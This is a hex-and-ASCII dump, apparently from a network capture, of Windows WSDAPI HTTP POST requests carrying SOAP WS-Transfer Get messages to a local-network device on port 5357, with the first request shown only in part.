0x000002b0 (00688)   6f3e3c77 73613a41 64647265 73733e68   o><wsa:Address>h
0x000002c0 (00704)   7474703a 2f2f7363 68656d61 732e786d   ttp://schemas.xm
0x000002d0 (00720)   6c736f61 702e6f72 672f7773 2f323030   lsoap.org/ws/200
0x000002e0 (00736)   342f3038 2f616464 72657373 696e672f   4/08/addressing/
0x000002f0 (00752)   726f6c65 2f616e6f 6e796d6f 75733c2f   role/anonymous</
0x00000300 (00768)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000310 (00784)   613a5265 706c7954 6f3e3c77 73613a46   a:ReplyTo><wsa:F
0x00000320 (00800)   726f6d3e 3c777361 3a416464 72657373   rom><wsa:Address
0x00000330 (00816)   3e75726e 3a757569 643a6637 30393763   >urn:uuid:f7097c
0x00000340 (00832)   30382d33 3665642d 34653461 2d396565   08-36ed-4e4a-9ee
0x00000350 (00848)   612d6462 62323862 36343039 62613c2f   a-dbb28b6409ba</
0x00000360 (00864)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000370 (00880)   613a4672 6f6d3e3c 6c6d733a 4c617267   a:From><lms:Larg
0x00000380 (00896)   654d6574 61646174 61537570 706f7274   eMetadataSupport
0x00000390 (00912)   2f3e3c2f 736f6170 3a486561 6465723e   /></soap:Header>
0x000003a0 (00928)   3c736f61 703a426f 64792f3e 3c2f736f   <soap:Body/></so
0x000003b0 (00944)   61703a45 6e76656c 6f70653e            ap:Envelope>

0x00000000 (00000)   504f5354 202f3365 31363236 34372d63   POST /3e162647-c
0x00000010 (00016)   3364382d 34346333 2d393937 622d3061   3d8-44c3-997b-0a
0x00000020 (00032)   63396135 66363838 33322f20 48545450   c9a5f68832/ HTTP
0x00000030 (00048)   2f312e31 0d0a4361 6368652d 436f6e74   /1.1..Cache-Cont
0x00000040 (00064)   726f6c3a 206e6f2d 63616368 650d0a43   rol: no-cache..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2043 6c6f7365   onnection: Close
0x00000060 (00096)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x00000070 (00112)   68650d0a 436f6e74 656e742d 54797065   he..Content-Type
0x00000080 (00128)   3a206170 706c6963 6174696f 6e2f736f   : application/so
0x00000090 (00144)   61702b78 6d6c0d0a 55736572 2d416765   ap+xml..User-Age
0x000000a0 (00160)   6e743a20 57534441 50490d0a 436f6e74   nt: WSDAPI..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3733330d   ent-Length: 733.
0x000000c0 (00192)   0a486f73 743a2031 39322e31 36382e31   .Host: 192.168.1
0x000000d0 (00208)   30302e31 33363a35 3335370d 0a0d0a3c   00.136:5357....<
0x000000e0 (00224)   3f786d6c 20766572 73696f6e 3d22312e   ?xml version="1.
0x000000f0 (00240)   30222065 6e636f64 696e673d 22757466   0" encoding="utf
0x00000100 (00256)   2d38223f 3e3c736f 61703a45 6e76656c   -8"?><soap:Envel
0x00000110 (00272)   6f706520 786d6c6e 733a736f 61703d22   ope xmlns:soap="
0x00000120 (00288)   68747470 3a2f2f77 77772e77 332e6f72   http://www.w3.or
0x00000130 (00304)   672f3230 30332f30 352f736f 61702d65   g/2003/05/soap-e
0x00000140 (00320)   6e76656c 6f706522 20786d6c 6e733a77   nvelope" xmlns:w
0x00000150 (00336)   73613d22 68747470 3a2f2f73 6368656d   sa="http://schem
0x00000160 (00352)   61732e78 6d6c736f 61702e6f 72672f77   as.xmlsoap.org/w
0x00000170 (00368)   732f3230 30342f30 382f6164 64726573   s/2004/08/addres
0x00000180 (00384)   73696e67 2220786d 6c6e733a 6c6d733d   sing" xmlns:lms=
0x00000190 (00400)   22687474 703a2f2f 73636865 6d61732e   "http://schemas.
0x000001a0 (00416)   6d696372 6f736f66 742e636f 6d2f7769   microsoft.com/wi
0x000001b0 (00432)   6e646f77 732f6c6d 732f3230 30372f30   ndows/lms/2007/0
0x000001c0 (00448)   38223e3c 736f6170 3a486561 6465723e   8"><soap:Header>
0x000001d0 (00464)   3c777361 3a546f3e 75726e3a 75756964   <wsa:To>urn:uuid
0x000001e0 (00480)   3a336531 36323634 372d6333 64382d34   :3e162647-c3d8-4
0x000001f0 (00496)   3463332d 39393762 2d306163 39613566   4c3-997b-0ac9a5f
0x00000200 (00512)   36383833 323c2f77 73613a54 6f3e3c77   68832</wsa:To><w
0x00000210 (00528)   73613a41 6374696f 6e3e6874 74703a2f   sa:Action>http:/
0x00000220 (00544)   2f736368 656d6173 2e786d6c 736f6170   /schemas.xmlsoap
0x00000230 (00560)   2e6f7267 2f77732f 32303034 2f30392f   .org/ws/2004/09/
0x00000240 (00576)   7472616e 73666572 2f476574 3c2f7773   transfer/Get</ws
0x00000250 (00592)   613a4163 74696f6e 3e3c7773 613a4d65   a:Action><wsa:Me
0x00000260 (00608)   73736167 6549443e 75726e3a 75756964   ssageID>urn:uuid
0x00000270 (00624)   3a376464 39653732 302d6230 37322d34   :7dd9e720-b072-4
0x00000280 (00640)   3936362d 61336338 2d383137 61636239   966-a3c8-817acb9
0x00000290 (00656)   63323239 623c2f77 73613a4d 65737361   c229b</wsa:Messa
0x000002a0 (00672)   67654944 3e3c7773 613a5265 706c7954   geID><wsa:ReplyT
0x000002b0 (00688)   6f3e3c77 73613a41 64647265 73733e68   o><wsa:Address>h
0x000002c0 (00704)   7474703a 2f2f7363 68656d61 732e786d   ttp://schemas.xm
0x000002d0 (00720)   6c736f61 702e6f72 672f7773 2f323030   lsoap.org/ws/200
0x000002e0 (00736)   342f3038 2f616464 72657373 696e672f   4/08/addressing/
0x000002f0 (00752)   726f6c65 2f616e6f 6e796d6f 75733c2f   role/anonymous</
0x00000300 (00768)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000310 (00784)   613a5265 706c7954 6f3e3c77 73613a46   a:ReplyTo><wsa:F
0x00000320 (00800)   726f6d3e 3c777361 3a416464 72657373   rom><wsa:Address
0x00000330 (00816)   3e75726e 3a757569 643a6533 34383666   >urn:uuid:e3486f
0x00000340 (00832)   31302d66 3433362d 34636365 2d383539   10-f436-4cce-859
0x00000350 (00848)   352d3665 34326230 62373462 35663c2f   5-6e42b0b74b5f</
0x00000360 (00864)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000370 (00880)   613a4672 6f6d3e3c 6c6d733a 4c617267   a:From><lms:Larg
0x00000380 (00896)   654d6574 61646174 61537570 706f7274   eMetadataSupport
0x00000390 (00912)   2f3e3c2f 736f6170 3a486561 6465723e   /></soap:Header>
0x000003a0 (00928)   3c736f61 703a426f 64792f3e 3c2f736f   <soap:Body/></so
0x000003b0 (00944)   61703a45 6e76656c 6f70653e            ap:Envelope>


Strings